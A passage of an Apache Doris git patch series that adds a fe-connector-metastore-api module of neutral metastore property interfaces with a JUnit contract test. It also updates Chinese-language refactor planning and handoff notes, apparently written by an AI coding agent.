注册(紧随 fe-foundation)。验证:AuthTypeTest 3/0 + KerberosAuthSpecTest 3/0、checkstyle 0、BUILD SUCCESS。**authenticator 机制子集(hadoop 依赖 + trino `KerberosTicketUtils`→JDK 替换)= 待续**(P2-T02 消费 HMS kerberos 时增量补)。 - **做什么**:新建顶层模块 `fe-kerberos`(依赖**仅** hadoop-auth/hadoop-common;trino `KerberosTicketUtils` 用 JDK `javax.security.auth.kerberos` 等价替换)。**本步只承载 paimon HMS 所需**的 kerberos facts 载体(`KerberosAuthSpec` + 必要的 `AuthenticationConfig`/`HadoopAuthenticator` 子集),供 `fe-connector-metastore-spi` 的 `HmsMetastoreBackend` 产出 facts。**不碰 fe-common / fe-filesystem-hdfs 既有路径**。 - **验收**:模块编译、零 fe-core/fe-connector/fe-filesystem import(纯叶子,gate);paimon HMS kerberos facts 经 fe-kerberos 类型表达;真正 `UGI.doAs` 仍走 `ctx.executeAuthenticated`(§5 不变量 4);fe-common/fe-filesystem-hdfs 既有 kerberos 路径**零改动**(§6 零改动核对)。 - **依赖**:P2-T02(facts 消费方)。设计 §3.5 / **D-007 步骤 a**。**✅ 纳入本次(用户 2026-06-17 确认)。** From 44d1fec4dcb109684f7a8c72a6660bcce5373ad2 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 05:36:03 +0800 Subject: [PATCH 090/128] [P2-T01] fe-connector-metastore-api: neutral metastore connection contracts First API module of P2 (metastore SPI). Mirrors fe-filesystem-api's thin contract style: exposes only neutral Map/scalar facts, never HiveConf/ Hadoop/SDK types. - MetaStoreProperties: providerName() + capability methods needsStorage() / needsVendedCredentials() (default false) + validate() (default no-op) + rawProperties()/matchedProperties(). No per-backend MetaStoreType enum; backend identity is a string and behaviour is capability methods (D-006). - Five backend sub-interfaces used by paimon: HMS/DLF/REST/JDBC/FileSystem. HmsMetaStoreProperties carries AuthType + Optional from fe-kerberos. Glue/S3Tables are intentionally not defined this round (adding one later needs no api/spi change). Depends only on fe-kerberos (D-013): the api is pure interfaces and does not use @ConnectorProperty/StorageProperties, so fe-foundation/fe-filesystem-api are deferred to the spi module where they are actually used (design 3.1 footnote updated). pom mirrors fe-connector-api (compiled into fe-core, not a deployed plugin); registered in fe-connector/pom.xml. MetaStorePropertiesContractTest 3/0 (capability defaults conservative; overridable; HMS sub-interface integrates fe-kerberos facts). checkstyle 0; connector import gate exit 0; no forbidden fe-core imports. Docker e2e not run (P2-T05 gate). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../fe-connector-metastore-api/pom.xml | 73 ++++++++++ .../metastore/DlfMetaStoreProperties.java | 30 ++++ .../FileSystemMetaStoreProperties.java | 28 ++++ .../metastore/HmsMetaStoreProperties.java | 50 +++++++ .../metastore/JdbcMetaStoreProperties.java | 40 ++++++ .../metastore/MetaStoreProperties.java | 63 +++++++++ .../metastore/RestMetaStoreProperties.java | 30 ++++ .../MetaStorePropertiesContractTest.java | 133 ++++++++++++++++++ fe/fe-connector/pom.xml | 1 + ...age-property-refactor-design-2026-06-17.md | 2 + .../metastore-storage-refactor/HANDOFF.md | 35 +++-- .../metastore-storage-refactor/PROGRESS.md | 8 +- plan-doc/metastore-storage-refactor/tasks.md | 7 +- 13 files changed, 481 insertions(+), 19 deletions(-) create mode 100644 fe/fe-connector/fe-connector-metastore-api/pom.xml create mode 100644 fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/DlfMetaStoreProperties.java create mode 100644 fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/FileSystemMetaStoreProperties.java create mode 100644 fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/HmsMetaStoreProperties.java create mode 100644 fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/JdbcMetaStoreProperties.java create mode 100644 fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/MetaStoreProperties.java create mode 100644 fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/RestMetaStoreProperties.java create mode 100644 fe/fe-connector/fe-connector-metastore-api/src/test/java/org/apache/doris/connector/metastore/MetaStorePropertiesContractTest.java diff --git a/fe/fe-connector/fe-connector-metastore-api/pom.xml b/fe/fe-connector/fe-connector-metastore-api/pom.xml new file mode 100644 index 00000000000000..947712eb0bdff4 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-api/pom.xml @@ -0,0 +1,73 @@ + + + + 4.0.0 + + + org.apache.doris + fe-connector + ${revision} + ../pom.xml + + + fe-connector-metastore-api + jar + Doris FE Connector Metastore API + + Thin, neutral contract for connector metastore connection properties + (MetaStoreProperties + HMS/DLF/REST/JDBC/FileSystem sub-interfaces). + Exposes only neutral Map/scalar facts; never leaks HiveConf/Hadoop/SDK + types. Backends are identified by providerName() + capability methods, + not a per-backend enum (D-006). Depends on fe-kerberos for the neutral + AuthType / KerberosAuthSpec facts (D-013). + + + + + ${project.groupId} + fe-kerberos + ${project.version} + + + org.junit.jupiter + junit-jupiter + test + + + + + doris-fe-connector-metastore-api + + + org.apache.maven.plugins + maven-dependency-plugin + + + + copy-plugin-deps + none + + + + + + diff --git a/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/DlfMetaStoreProperties.java b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/DlfMetaStoreProperties.java new file mode 100644 index 00000000000000..ded28c6d61624f --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/DlfMetaStoreProperties.java @@ -0,0 +1,30 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore; + +import java.util.Map; + +/** + * Neutral connection facts for an Aliyun DLF metastore backend: the {@code dlf.catalog.*} key set + * (endpoint/region/credentials), with endpoint-from-region derivation handled during parsing. + */ +public interface DlfMetaStoreProperties extends MetaStoreProperties { + + /** The {@code dlf.catalog.*} configuration keys the connector layers onto its catalog options. */ + Map toDlfCatalogConf(); +} diff --git a/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/FileSystemMetaStoreProperties.java b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/FileSystemMetaStoreProperties.java new file mode 100644 index 00000000000000..a3a9dc87a156c4 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/FileSystemMetaStoreProperties.java @@ -0,0 +1,28 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore; + +/** + * Neutral connection facts for a filesystem (warehouse-only) metastore backend. The bound storage + * config travels separately as {@code List}; {@link #needsStorage()} returns true. + */ +public interface FileSystemMetaStoreProperties extends MetaStoreProperties { + + /** The warehouse root location for the filesystem catalog. */ + String getWarehouse(); +} diff --git a/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/HmsMetaStoreProperties.java b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/HmsMetaStoreProperties.java new file mode 100644 index 00000000000000..2e4b85188ec497 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/HmsMetaStoreProperties.java @@ -0,0 +1,50 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore; + +import org.apache.doris.kerberos.AuthType; +import org.apache.doris.kerberos.KerberosAuthSpec; + +import java.util.Map; +import java.util.Optional; + +/** + * Neutral connection facts for a Hive Metastore (HMS) backend. The concrete {@code HiveConf} is + * assembled by the connector (which has the hive classes); this contract only carries neutral keys. + */ +public interface HmsMetaStoreProperties extends MetaStoreProperties { + + /** The metastore thrift URI ({@code hive.metastore.uris}). */ + String getUri(); + + /** Whether the metastore connection is {@code SIMPLE} or {@code KERBEROS} authenticated. */ + AuthType getAuthType(); + + /** + * Neutral {@code hive.*} / {@code hadoop.security.*} / SASL overrides to be layered onto the + * connector's {@code HiveConf}. Includes the HMS service principal when configured. + */ + Map toHiveConfOverrides(); + + /** + * The client Kerberos login facts (principal/keytab), present only for a Kerberos-secured + * metastore. The real {@code UGI.doAs} is still performed FE-side via + * {@code ConnectorContext.executeAuthenticated}; this only carries the facts. + */ + Optional kerberos(); +} diff --git a/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/JdbcMetaStoreProperties.java b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/JdbcMetaStoreProperties.java new file mode 100644 index 00000000000000..ea9e1c61e0e0ac --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/JdbcMetaStoreProperties.java @@ -0,0 +1,40 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore; + +/** + * Neutral connection facts for a JDBC catalog metastore backend (e.g. paimon jdbc catalog). + * The driver URL is resolved against the engine's jdbc-drivers directory during parsing. + */ +public interface JdbcMetaStoreProperties extends MetaStoreProperties { + + /** The JDBC connection URI. */ + String getUri(); + + /** The JDBC user, or empty when not configured. */ + String getUser(); + + /** The JDBC password, or empty when not configured. */ + String getPassword(); + + /** The resolved driver jar URL, or empty when the engine-provided driver is used. */ + String getDriverUrl(); + + /** The JDBC driver class name, or empty when not configured. */ + String getDriverClass(); +} diff --git a/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/MetaStoreProperties.java b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/MetaStoreProperties.java new file mode 100644 index 00000000000000..89b6eb4fb25dd0 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/MetaStoreProperties.java @@ -0,0 +1,63 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore; + +import java.util.Map; + +/** + * Public contract for a connector's bound-and-validated metastore connection properties — + * the metastore-side counterpart of fe-filesystem's {@code StorageProperties}. + * + *

    Following the same thin-interface principle as fe-filesystem-api, this API exposes only + * neutral {@code Map}/scalar facts and never leaks {@code HiveConf}/Hadoop/engine-SDK types; + * the concrete {@code HiveConf} (and any SDK catalog) is assembled on the connector side. + * + *

    The backend is identified by a {@link #providerName()} string and cross-cutting behaviour + * is expressed through capability methods (e.g. {@link #needsStorage()}), deliberately avoiding a + * per-backend {@code MetaStoreType} enum and the central {@code switch} statements that come with + * it (D-006). Backend discovery/dispatch is done by {@code MetaStoreProvider.supports(Map)} + + * ServiceLoader in fe-connector-metastore-spi. + */ +public interface MetaStoreProperties { + + /** Stable backend identifier, e.g. "HMS", "DLF", "REST", "JDBC", "FILESYSTEM". */ + String providerName(); + + /** + * Whether this backend needs the bound {@code List} to be supplied during + * parsing (FileSystem/DLF do; HMS/REST/JDBC do not). Replaces a per-backend enum switch. + */ + default boolean needsStorage() { + return false; + } + + /** Whether this backend uses vended credentials (replaces {@code VendedCredentialsFactory} type switch). */ + default boolean needsVendedCredentials() { + return false; + } + + /** Validates the bound facts; the default is a no-op for backends with no extra invariants. */ + default void validate() { + } + + /** The raw, unmodified properties the catalog was created with. */ + Map rawProperties(); + + /** The subset of raw properties actually matched by the backend's {@code @ConnectorProperty} aliases. */ + Map matchedProperties(); +} diff --git a/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/RestMetaStoreProperties.java b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/RestMetaStoreProperties.java new file mode 100644 index 00000000000000..11aa379d74581f --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/RestMetaStoreProperties.java @@ -0,0 +1,30 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore; + +import java.util.Map; + +/** Neutral connection facts for a REST catalog metastore backend. */ +public interface RestMetaStoreProperties extends MetaStoreProperties { + + /** The REST catalog service URI. */ + String getUri(); + + /** The neutral REST catalog option keys the connector passes through to its catalog. */ + Map toRestOptions(); +} diff --git a/fe/fe-connector/fe-connector-metastore-api/src/test/java/org/apache/doris/connector/metastore/MetaStorePropertiesContractTest.java b/fe/fe-connector/fe-connector-metastore-api/src/test/java/org/apache/doris/connector/metastore/MetaStorePropertiesContractTest.java new file mode 100644 index 00000000000000..8727bb2996ffcc --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-api/src/test/java/org/apache/doris/connector/metastore/MetaStorePropertiesContractTest.java @@ -0,0 +1,133 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore; + +import org.apache.doris.kerberos.AuthType; +import org.apache.doris.kerberos.KerberosAuthSpec; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Map; +import java.util.Optional; + +/** + * Contract tests for the neutral metastore API. These pin the documented capability defaults and + * verify the HMS sub-interface carries the fe-kerberos facts — i.e. that the api compiles against + * and integrates the {@code fe-kerberos} {@link AuthType}/{@link KerberosAuthSpec} types. + */ +class MetaStorePropertiesContractTest { + + /** Minimal MetaStoreProperties that overrides nothing, to exercise the default methods. */ + private static class BareMetaStore implements MetaStoreProperties { + @Override + public String providerName() { + return "BARE"; + } + + @Override + public Map rawProperties() { + return Map.of("k", "v"); + } + + @Override + public Map matchedProperties() { + return Map.of(); + } + } + + @Test + void capabilityDefaults_areConservative() { + // Intent (D-006 / §1.4): a backend opts IN to needing storage / vended credentials; the + // safe default for both is false so HMS/REST/JDBC do not pull storage they do not use. + MetaStoreProperties ms = new BareMetaStore(); + + Assertions.assertEquals("BARE", ms.providerName()); + Assertions.assertFalse(ms.needsStorage()); + Assertions.assertFalse(ms.needsVendedCredentials()); + Assertions.assertDoesNotThrow(ms::validate); + Assertions.assertEquals("v", ms.rawProperties().get("k")); + Assertions.assertTrue(ms.matchedProperties().isEmpty()); + } + + @Test + void capabilities_canBeOverridden() { + MetaStoreProperties needsBoth = new BareMetaStore() { + @Override + public boolean needsStorage() { + return true; + } + + @Override + public boolean needsVendedCredentials() { + return true; + } + }; + + Assertions.assertTrue(needsBoth.needsStorage()); + Assertions.assertTrue(needsBoth.needsVendedCredentials()); + } + + @Test + void hmsSubInterface_carriesNeutralKerberosFacts() { + KerberosAuthSpec spec = new KerberosAuthSpec("hive/_HOST@REALM", "/etc/hive.keytab"); + HmsMetaStoreProperties hms = new HmsMetaStoreProperties() { + @Override + public String providerName() { + return "HMS"; + } + + @Override + public Map rawProperties() { + return Map.of(); + } + + @Override + public Map matchedProperties() { + return Map.of(); + } + + @Override + public String getUri() { + return "thrift://hms:9083"; + } + + @Override + public AuthType getAuthType() { + return AuthType.KERBEROS; + } + + @Override + public Map toHiveConfOverrides() { + return Map.of("hive.metastore.sasl.enabled", "true"); + } + + @Override + public Optional kerberos() { + return Optional.of(spec); + } + }; + + Assertions.assertEquals("thrift://hms:9083", hms.getUri()); + Assertions.assertEquals(AuthType.KERBEROS, hms.getAuthType()); + Assertions.assertEquals("true", hms.toHiveConfOverrides().get("hive.metastore.sasl.enabled")); + Assertions.assertTrue(hms.kerberos().isPresent()); + Assertions.assertTrue(hms.kerberos().get().hasCredentials()); + Assertions.assertEquals("hive/_HOST@REALM", hms.kerberos().get().getPrincipal()); + } +} diff --git a/fe/fe-connector/pom.xml b/fe/fe-connector/pom.xml index 2e1a319a0a6076..89640f975717c6 100644 --- a/fe/fe-connector/pom.xml +++ b/fe/fe-connector/pom.xml @@ -40,6 +40,7 @@ under the License. fe-connector-api fe-connector-spi + fe-connector-metastore-api fe-connector-es fe-connector-trino fe-connector-maxcompute diff --git a/plan-doc/designs/metastore-storage-property-refactor-design-2026-06-17.md b/plan-doc/designs/metastore-storage-property-refactor-design-2026-06-17.md index 97648142be5c56..8c675665130929 100644 --- a/plan-doc/designs/metastore-storage-property-refactor-design-2026-06-17.md +++ b/plan-doc/designs/metastore-storage-property-refactor-design-2026-06-17.md @@ -145,6 +145,8 @@ fe-core/BE: 由 AWS_* map 组装 TS3StorageParam(thrift 仍在 fe-core S3-RPC ### 3.1 `fe-connector-metastore-api`(纯契约,依赖 fe-foundation + fe-filesystem-api) +> **(D-013 修订)** P2-T01 落地时 api 仅依赖 **fe-kerberos**(为 `HmsMetaStoreProperties` 的 `AuthType`/`KerberosAuthSpec` 中立 facts);`fe-foundation`/`fe-filesystem-api` 当前 api 纯接口未直接引用(`@ConnectorProperty` 绑定、`StorageProperties` 入参均在 spi 用),故留待 spi(P2-T02)按需引入,避免 api 声明未用依赖。`AuthType`/`KerberosAuthSpec` 归 fe-kerberos(先于 P2-T01 建,D-013)。 + 镜像 `fe-filesystem-api` 的瘦接口风格,**只暴露中立的 Map / 标量 facts,不暴露 `HiveConf`/Hadoop/SDK 类型**(HiveConf 的实体装配在连接器侧,连接器有 hive-shade)。 ```java diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index 91280518caf4aa..d3a5933bc25bbc 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -7,9 +7,17 @@ --- -**更新时间**:2026-06-18(实现 session:**FU-T02 + FU-T03 完成**,R-008 + R-006 闭环;**用户定 D-012:跳过/推迟 P1-T06 docker,直接进 P2 metastore SPI**,下一步 = **P2-T01**) +**更新时间**:2026-06-18(实现 session:FU-T02 + FU-T03 闭环 → **D-012 跳过 P1-T06 进 P2** → **P3a-T01 facts-carrier ✅(fe-kerberos)+ P2-T01 ✅(fe-connector-metastore-api)**;下一步 = **P2-T02**) **更新人**:Claude(Opus 4.8) +> **本 session P2 进度补注(最新在最前)**: +> - **P2-T01 ✅(commit 待提交)**:新建 `fe-connector-metastore-api`(`org.apache.doris.connector.metastore`)= `MetaStoreProperties`(`providerName()`+能力方法 `needsStorage()`/`needsVendedCredentials()` 默认 false+`validate()` no-op+`rawProperties()`/`matchedProperties()`,**无 `MetaStoreType` 枚举** D-006)+ 5 子接口 HMS/DLF/REST/JDBC/FileSystem(中立 Map/标量;`HmsMetaStoreProperties` 用 fe-kerberos `AuthType`+`Optional`)。**依赖仅 fe-kerberos**(D-013;fe-foundation/fe-filesystem-api api 纯接口未用→留 spi)。pom 镜像 fe-connector-api(copy-plugin-deps none);注册 fe-connector/pom.xml。**未建 Glue/S3Tables**(留扩展)。`MetaStorePropertiesContractTest` 3/0、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import。 +> - **P3a-T01 facts-carrier ✅(commit `51df4fccd01`,D-013)**:新顶层叶子 `fe-kerberos`(**零生产依赖**)facts 切片 `AuthType`(SIMPLE/KERBEROS, `fromString` 仅 "kerberos" 命中余皆 SIMPLE) + `KerberosAuthSpec`(client principal+keytab 不可变值对象, `hasCredentials()` 需两者非空;HMS service principal 不在此=HiveConf override)。6 测绿、checkstyle 0。**authenticator 机制子集(hadoop 依赖 + trino KerberosTicketUtils→JDK)= 待 P2-T02 增量补**。 +> - **决策**:D-012(跳过/推迟 P1-T06 docker,验证折进 P2-T05)|D-013(kerberos facts 归 fe-kerberos、先建;metastore-api 依赖 fe-kerberos)。 +> - ⚠️ **docker e2e 全程未跑**(留 P2-T05)。 + +

    更早本 session(FU-T02 + FU-T03,已完成) + ## 这次 session 完成了什么(FU-T02 + FU-T03) **FU-T02 ✅(R-008 闭环,commit `e5b088b14e7`)** — fe-filesystem typed OSS/COS/OBS BE map 补 `AWS_CREDENTIALS_PROVIDER_TYPE`: @@ -41,24 +49,23 @@ **对抗 review(`wf_5db99e32-2ad`,27 agent,4 lens + verify)**:清场——packaging 无跨 loader 风险、独立 agent 逐键复核 byte-level parity、BE-only 无新 catalog 路回归、强 oss-hdfs-wrong-keys 断言被 verify **推翻**、`new Configuration()` 默认 bloat 是 legacy-faithful。**3 实质修**:①malformed-`uri` swallow→**fail-loud**(对齐 legacy);②2 stale 注释;③+11 测试。**F1**(config-dir 未接 `Config.hadoop_config_dir`)→ 用户选「现在接好」=sysprop 桥。
    + ## 当前状态 -- 阶段:Research ✅ / Design ✅(**12 决策 D-001..D-012**)/ **Implement 🚧(P1 storage 5/6,P1-T06 docker 推迟[D-012];进入 P2 metastore SPI)**。 -- 任务计数 **8/14**(P0: 2/2 ✅ | P1: 5/6,**P1-T06 推迟**[非取消,docker 验证折进 P2-T05 一次跑]| P2: 0/5 | P3a: 0/1)| follow-up **FU-T01 ✅ + FU-T02 ✅ + FU-T03 ✅**| P3b 占位。 -- **R-006 / R-007 / R-008 全部已闭环**(UT/mutation 层面)。typed BE 路现对 S3/OSS/COS/OBS/**HDFS** 全产 BE 键 + OSS/COS/OBS 无凭据补 `ANONYMOUS` + 调优默认有 UT 守护。 -- ⚠️ **e2e/docker 全程未跑**(P1 收口 storage 等价的真闸 + P2 metastore T2/5-flavor 闸 一并留到 P2-T05 docker 跑;D-012)。 +- 阶段:Research ✅ / Design ✅(**13 决策 D-001..D-013**)/ **Implement 🚧(P1 storage 5/6 P1-T06 docker 推迟[D-012];P2: 1/5 = P2-T01 ✅;P3a facts-carrier ✅)**。 +- 任务计数 **9/14**(P0: 2/2 ✅ | P1: 5/6,**P1-T06 推迟** | **P2: 1/5(P2-T01 ✅)** | P3a: 0/1,facts-carrier 切片 ✅ 机制待续)| follow-up FU-T01/02/03 ✅| P3b 占位。 +- **新增 2 模块**:顶层叶子 `fe-kerberos`(facts 切片)+ `fe-connector-metastore-api`(5 子接口)。**R-006/R-007/R-008 已闭环**(UT/mutation 层)。 +- ⚠️ **e2e/docker 全程未跑**(P1 storage 等价 T1 + P2 metastore T2/5-flavor 闸 一并留 P2-T05 docker 跑;D-012)。 -## 下一步(明确):P2-T01(新建 fe-connector-metastore-api) -> **用户定 D-012:跳过/推迟 P1-T06 docker,直接进 P2**(docker 验证集中到 P2-T05 一次跑:届时同时覆盖 P1 storage 等价 T1 + P2 metastore T2 + 5 flavor + vended + kerberos)。 +## 下一步(明确):P2-T02(新建 fe-connector-metastore-spi) > **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手;实施前 WORKFLOW §2 单任务 TDD + 一句话复述。** -**P2-T01(新建 `fe-connector-metastore-api`)**:新模块(依赖 fe-foundation + fe-filesystem-api)= `MetaStoreProperties` 接口(`String providerName()` + 能力方法 `needsStorage()`/`needsVendedCredentials()`,**无 per-backend 枚举**,D-006)+ 子接口 HMS/DLF/REST/JDBC/FileSystem(中立 Map/标量,**不暴露** HiveConf/SDK 类型)。**不实现** Glue/S3Tables(留扩展)。新模块声明进 `fe-connector/pom.xml`。 -- **现场 recon 必做**(顶部流程 step 2): - 1. 读设计 §3.1(接口签名权威来源)+ **D-006**(确认无 `MetaStoreType` 枚举、用 provider+能力方法)+ **D-004**(@ConnectorProperty 绑定)。 - 2. 对照真实代码:fe-core `datasource/property/metastore/**`(旧 `MetastoreProperties` + `Paimon*MetaStoreProperties` 的接口面/Type/能力)+ paimon 现 `PaimonCatalogFactory`(手抄 HMS/DLF 逻辑,P2-T02/T03 上移的来源)+ `FileSystemProvider`/`FileSystemPluginManager`(D-006 镜像样板)。 - 3. 核对依赖图红线:metastore-api 只可依赖 `fe-foundation` + `fe-filesystem-api`(+ fe-connector-api/spi);不得 import fe-core/{catalog,common,datasource,...}。 -- **范围张力提示**:P2 是大阶段(2 新模块 + provider SPI + 移植解析逻辑 + P3a fe-kerberos 交织:P3a-T01 依赖 P2-T02 作 facts 消费方)。**P2-T01 仅建 api 接口骨架**(无解析逻辑,纯类型);解析/provider 在 P2-T02。实施前建议 AskUserQuestion 定 P2-T01 的接口边界(子接口集合、能力方法集合)若设计 §3.1 有不确定。 -- **白名单变更**:P2 需把 `fe-connector-metastore-api/**`(+后续 spi)加入 WORKFLOW §4.1 白名单(原已列为「新建」允许路径,见 §4.1);`fe-connector/pom.xml` 新增模块声明(已在白名单)。 +**P2-T02(新建 `fe-connector-metastore-spi`,依赖 metastore-api + fe-foundation + fe-filesystem-api + fe-kerberos)**:5 个 `Hms/Dlf/Rest/Jdbc/FileSystem MetastoreBackend.parse(raw, storageList)`(`@ConnectorProperty` typed holder 绑定,D-004)+ `JdbcDriverSupport` + **`MetaStoreProvider

    ` SPI(`supports(Map)` 自识别 + `bind`)+ 5 内置 provider + 各 `META-INF/services` + `MetaStoreProviders.bind` 派发**(D-006,镜像 `FileSystemProvider`/`FileSystemPluginManager`)。 +- **来源 = 上移 paimon `PaimonCatalogFactory`(631 LOC 手抄)去 fe-core 化**:HiveConf→中立 map、authenticator→`KerberosAuthSpec` facts。**fe-core 旧 `HMSBaseProperties`/`Paimon*MetaStoreProperties` 一律不动**(仍服务 hive/hudi/iceberg)。 +- **此处增量补 fe-kerberos authenticator 机制子集**(hadoop-auth/hadoop-common 依赖 + trino `KerberosTicketUtils`→JDK `javax.security.auth.kerberos` 替换;P3a-T01 续)——`HmsMetastoreBackend` 产出 `KerberosAuthSpec` 需要它。 +- **现场 recon 必做**:①设计 §3.2(权威)+ D-006/D-004;②真实代码 `PaimonCatalogFactory`(`buildHmsHiveConf`:444 / `buildDlfHiveConf` / `resolveDriverUrl` / `validate` / 别名常量 `PaimonConnectorProperties`)= parse 逻辑来源;③`FileSystemPluginManager.bindAll` / `FileSystemProvider` ServiceLoader 样板;④fe-core `HMSBaseProperties.initHadoopAuthenticator`(kerberos 键顺序)+ `PaimonAliyunDLFMetaStoreProperties.buildHiveConf`(DLF 8 键 + endpoint-from-region)作 T2 等价参照(**不动**,只读对照)。 +- **T2 等价性**(设计 §5):`*MetastoreBackend.parse` 产出中立 map == fe-core 旧 `Paimon*MetaStoreProperties`(HiveConf key 集 + ParamRules 报错文案);UT 落地(docker 真闸 P2-T05)。 +- **白名单**:`fe-connector-metastore-spi/**`(§4.1 已列「新建」)+ fe-kerberos/**(机制补充,D-013/§4.1 已加)+ `fe-connector/pom.xml`。 ## 未决 / 需注意 - ✅ 已闭环:R-006(FU-T03)、R-007(FU-T01)、R-008(FU-T02)。 diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index 84aec848e6c540..42977e6ae6026e 100644 --- 